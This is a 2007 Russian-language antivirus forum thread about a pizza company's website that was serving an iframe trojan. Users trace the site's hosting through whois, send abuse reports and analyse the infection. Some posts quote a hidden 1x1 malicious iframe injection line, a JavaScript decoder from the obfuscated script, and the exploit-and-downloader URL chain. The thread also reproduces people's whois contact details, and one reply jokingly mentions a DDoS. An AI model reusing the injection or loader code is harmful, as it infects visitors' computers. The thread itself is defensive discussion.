PDA

Просмотр полной версии : Троян на сайте. Владельцы игнорят..



M@xWell
23.07.2007, 09:35
Добрый день всем.
При входе на некоторый сайт KIS обнаружил Trojan-Clicker.HTML.IFrame.a. Я отписал хозяевам сайта об этом, чтоб они обратились к веб-мастеру. На это они ответили, что, мол, проблема решена, спасибо за содействие. Но на деле ничего они не предпринимали - KIS все также ругается... Я им написал еще раз, но они проигнорили. Можна как-то прикрыть доступ пользователей к их сайту? Компания работает в сфере услуг, и я не представляю, сколько людей заходит туда...

drongo
23.07.2007, 09:45
Можно к их провайдеру написать ;)Ну а если они сами провайдер- то бесполезно, разве что устроить DDos- но это не легально ;)Лучше название сайта тут указать, посмотрим. Сделай не активным линк.

Палыч
23.07.2007, 09:46
Пиши хостеру. Пиши провайдеру. Можно ещё и регистраторам написать.

M@xWell
23.07.2007, 09:52
Как узнать их хостер, провайдерa и регистраторa? Я этот сайт в поисковике нашел (чтоб проверить пришлось даже второй раз искать. т.к. ссылку не сохранил...). Соответственно никакой инфы нету, кроме самого сайта..
Сайт с заразой: :http:pizzamaximus.com
Отчет KIS:
обнаружено: троянская программа Trojan-Clicker.HTML.IFrame.a URL: :http:traffmanager.org/tds/iframe.php
ЗЫ: Еще решил вести с ними борьбу: буду писать на разные целенаправленные форумы о них.. Пусть о них люди знают>:)

5ergi0
23.07.2007, 09:53
У меня похожая ситуация, детектится вирь на сайте, владельцы говорят, что все нормально. На вирустотале семеро его видят.
Скрипт я выдернул с сайта, он приложен.

Палыч
23.07.2007, 09:59
IP 193.178.144.85

inetnum: 193.178.144.0 - 193.178.147.255
netname: IPROMO
descr: IpromoGroup Ltd.
descr: Web hosting and domain names registration
descr: PO Box 740
descr: Kiev
descr: 01034
country: UA
admin-c: II151-RIPE
tech-c: LH2956-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: IPROMO-MNT
mnt-routes: IPROMO-MNT
mnt-domains: IPROMO-MNT
source: RIPE # Filtered

role: IQ-INTER.NET IRHSP role object
address: PO Box 740
address: Kiev-34, Ukraine
address: 01034
phone: +44 078 03 04 05 06
phone: +38 067 704 78 26
phone: +38 044 24 707 24
e-mail: lubes@ipromogroup.com
admin-c: LH2956-RIPE
tech-c: LH2956-RIPE
nic-hdl: II151-RIPE
mnt-by: IPROMO-MNT
source: RIPE # Filtered

person: Lubes Haidamaka
address: PO Box 740
address: Kiev-34
address: Ukraine
phone: +38 044 24 707 24
e-mail: lubes@ipromogroup.com
nic-hdl: LH2956-RIPE
source: RIPE # Filtered

% Information related to '193.178.144.0/22AS21343'

route: 193.178.144.0/22
descr: IPromo Group
origin: AS21343
mnt-by: IPROMO-MNT
source: RIPE # Filtered

M@xWell
23.07.2007, 10:18
lubes@ipromogroup.com - сюда писать?
ЗЫ: А как ты это сделал?! :pray: Научи, хочу все знать! :D

Numb
23.07.2007, 10:27
ЗЫ: А как ты это сделал?! :pray: Научи, хочу все знать! :D
http://ru.wikipedia.org/wiki/Whois

Палыч
23.07.2007, 10:27
Сначала узнаём IP сайта. Для этого:
Пуск -- Выполнить-- ping -t ввв.pizzamaximus.com -- ОК
В чёрном окне смотрим айпишник.

Потом идём на какой-нибудь сайт, который по IP предоставляет сведения. Их в Интернете не один, и не два, а много. Я привык пользоваться http://old.antichat.ru/util/whois/
Забиваешь в строку ввода найденный IP и жмёшь кнопку Проверить.
Всё.

M@xWell
23.07.2007, 10:31
2Палыч: можна было не так подробно )) спасибо..

drongo
23.07.2007, 10:51
https://addons.mozilla.org/ru/firefox/addon/590 один клик заменят все телодвижения столь подробно описанные Палыч.

rav
23.07.2007, 11:27
Ещё проще- whois.domaintools.com.

M@xWell
23.07.2007, 11:38
Спс.. одного метода вполне хватит)).. Не отвлекаемся от темы.. Ктото страницу смотрел?

5ergi0
23.07.2007, 11:58
Смотрел
http://www.virustotal.com/resultado.html?6ab50852bdd31c871e8595b38c8d13ff

P.S. По моему скрипту: кто-нибудь знает, как его расшифровать?

M@xWell
23.07.2007, 12:48
хм... у меня Каспер ругнулся, а в твоем отчете - не нашел...

5ergi0
23.07.2007, 12:54
А я проверял страницу pizza, может скрипт еще что подгружает с traffmanager.org

borka
23.07.2007, 14:29
IP 193.178.144.85

Мне больше понравился отчет http://www.completewhois.com по hxxp://pizzamaximus.com:

DOMAIN: PIZZAMAXIMUS.COM

RSP: IMENA.ua
URL: http://www.imena.ua

created-date: 2007-02-02
updated-date: 2007-02-02
registration-expiration-date: 2008-02-02

owner-contact: P-JRF133
owner-fname: Jim
owner-lname: Fletcher
owner-street: rtertwert
owner-city: wqeqe
owner-zip: 99011
owner-country: UA
owner-phone: 23444
owner-email: wetrow@bk.ru

Добавлено через 10 минут

P.S. По моему скрипту: кто-нибудь знает, как его расшифровать?
Увы. Знаю только, что %3C%73%63%72... и т. д. представляют собой ASCII-коды. То есть то, что в "%", это следующее:
<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt (i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

vaber
23.07.2007, 14:44
Спс.. одного метода вполне хватит)).. Не отвлекаемся от темы.. Ктото страницу смотрел?
Сайт pizzamaximus.com либо взломан, либо владелец сайта сам разместил iframe с ссылкой на сайт с эксплоитом (за деньги само собой :)).
traffmanager.org/tds/iframe.php - traffmanager.org/tds/ifram.php -traffmanager.org/sploit.php (зашифрован полиморфным криптером HtmlGuard). Если расшифровать содержимое сплоита, то можно видеть, что он должен загрузить файл и выполнить (если уязвим IE) - traffmanager.org/exp/svc.exe, который в свою очередь должен скачать:


traffmanager.org/new/get_exd.php?l=

traffmanager.org/new/get_exa.php?l=

traffmanager.org/new/get_exb.php?l=

traffmanager.org/new/get_exc.php?l=

traffmanager.org/new/get_exe.php?l=Russian
Некоторые файлы недоступны. Те что скачиваются - пинч (svc4.exe) и руткит ddos.exe (снимает хуки, регистрируется как сервис, после старта запускает IE. спрятанный из кернела и завершает свою работу).

Палыч
23.07.2007, 14:48
Мне больше понравился отчет http://www.completewhois.com по hxxp://pizzamaximus.com:
Даааа... Дело ясное, что дело тёмное.

M@xWell
25.07.2007, 16:24
Во блин.. написал на lubes@ipromogroup.com.. игнорят.. >:(

SuperBrat
25.07.2007, 18:09
У меня похожая ситуация, детектится вирь на сайте, владельцы говорят, что все нормально. На вирустотале семеро его видят.
Скрипт я выдернул с сайта, он приложен.
ЛК: чисто, AVIRA: ложный детект - убрали.

KarpEn
25.07.2007, 18:41
Скажите, каким образом происходит внедрение гадости на сайт? Дело в том, что во все страницы на моем сайте, которые называются default.htm было вписано в конце:
echo "";echo "";<iframe src="hxxp://www.radiodeejay.hr/forum/lang/inexed.htm" width=1 height=1></iframe>
Фокс от этого вис, а те, кто юзают IE говорили, что цепляли троян. Если бы не это echo "";echo ""; я бы может и не заметил так сразу. Я, конечно, снес эту строчку, но как это было сделано? Если вставили раз, смогут и второй при желании, ведь дыра-то осталась?

5ergi0
25.07.2007, 23:15
Как вариант, украдены пароли на ftp...

Shark
30.07.2007, 08:23
Как узнать их хостер, провайдерa и регистраторa? Я этот сайт в поисковике нашел (чтоб проверить пришлось даже второй раз искать. т.к. ссылку не сохранил...). Соответственно никакой инфы нету, кроме самого сайта..
Сайт с заразой: :http:pizzamaximus.com
Отчет KIS:
обнаружено: троянская программа Trojan-Clicker.HTML.IFrame.a URL: :http:traffmanager.org/tds/iframe.php
ЗЫ: Еще решил вести с ними борьбу: буду писать на разные целенаправленные форумы о них.. Пусть о них люди знают>:)

Факт наличия вредоноса подтверждаю.
Делаю всё от меня зависящее.

Добавлено через 11 минут

Как вариант, украдены пароли на ftp...

Атаки начинаются с открытой публикации e-mail - Как вариант... :)

Важное правило: НИКОГДА НЕ ПУБЛИКУЙТЕ СВОЙ E-MAIL ТАК, ЧТОБЫ МОШЕННИК ЗНАЛ О НЁМ!

Используйте форму обратной связи - этим вы огородите себя от чужого злого умысла.

Добавлено через 5 минут

ЛК: чисто, AVIRA: ложный детект - убрали.

KIS 7 - уже визжит....
Судя по их записи, детект - свежий!

SuperBrat
30.07.2007, 10:13
Shark, я отвечал на http://virusinfo.info/showpost.php?p=124203&postcount=5
А вы о чем? Там ЛК, AVIRA и др. признали ложный детект или чистоту образца.
Несогласные:

File 111.txt received on 07.30.2007 09:05:19 (CET)
Antivirus Version Last Update Result
CAT-QuickHeal 9.00 2007.07.28 JS_/Seeker
Fortinet 2.91.0.0 2007.07.30 JS/Inor.A!tr.dldr
Ikarus T3.1.1.8 2007.07.30 Trojan-Downloader.JS.Inor.A
Norman 5.80.02 2007.07.27 JS/Exploit_based.D
VBA32 3.12.2.1 2007.07.30 Trojan-Downloader.JS.Psyme.cv

Additional information
File size: 2738 bytes
MD5: 8d4ba06269770f80227f81332e06cfcb
SHA1: 47647815d32104b5e555b97a39f4622c8531dcfd

Shark
30.07.2007, 11:48
Отправлено письмо следующего содержания:
Кому: marina_Karlenko@mail.ru

Тема: Предупреждение об опасности ресурса.

Здравствуйте, marina.

Настоящим письмом довожу до вашего сведения, что сайт
:http: pizzamaximus.com представляет серъёзную опасность для пользователей!

Данный сайт используется для загрузки вредоносного ПО.

Считаю своим долгом напомнить Вам об уголовной ответственности
за "Неправомерный доступ к компьютерной Информации" (статья 272, ч.2)
(http://www.uk-rf.net/u_kodeks_28.php#273)


--
С уважением,
Игорь Голов mailto:it-shark@rambler.ru

На тот момент у меня под рукой просто не было Нэзалэжного УК.
Бум работать! :)

Добавлено через 33 минуты

Во блин.. написал на lubes@ipromogroup.com.. игнорят.. >:(

Возможно ответ тут (http://forum.sevastopol.info/viewtopic.php?p=867059)

M@xWell
30.07.2007, 17:50
2Shark я ж в личку отписывал... ну ниче.. не думаю, чтоб они полезли в УК проверять, что означает ст.272 ))))) за ссылку спасибо - интересно почитать.. На сайте пицерии действительно контакты и в столице, и в Севастополе..

ЗЫ:
Возможно ответ тут Ого.. ниасилил... оказывается про этот сайт уже известно.. а я думал, велосипед покажу ;).. а Флетчер/Флечер с его сайтом GST жжут !

i_am
31.07.2007, 17:48
пишите сюда лучше
http://mirohost.net/contact.phtml

т.к они у них
3.147.178.193.in-addr.arpa IN PTR hostingalexa.mirohost.net 86400s (1.00:00:00)

M@xWell
01.08.2007, 10:30
2 i_am отправил. посмотрим, что ответят (если ответят)

ann beta
01.08.2007, 18:19
Интересно, почему whois не может определить адрес и улицу владельца,
а вместо этого пишет белиберду.Как такое возможно???

i_am
01.08.2007, 19:15
Это не вхуис не может определить, а была введена заранее fake информация. Кстати по правилам ICANN если подать абузу такой домен будет заблокирован, в случае, если владелец в течении 15 дней не изменит информацию на корректную. Посему можно написать и в imena.com.ua и пригрозить пожаловаться в ИКАНН если не примут меры. Сработает. Естдомаинс очень быстро, например, на это реагирует

кстати исходя из whois history было 2 варианта

Whois History: 2 records have been archived since 2007-06-15

к сожалению посмотреть инфу по старому вхуису сейчас не могу, т.к нет подписки на этот сервис. Может в ближайшее время продлю и скажу

M@xWell
02.08.2007, 10:43
Получил ответ:

Проверили, на сайте троянов не нашли, но может владельцы перезалили сайт.
Добавка iframe - с ссылкой на вирусы - частое явление, так что вполне может быть.

Зашел на сайт - действительно уже ниче не подгружается. Значит, все таки "мотивация" помогла)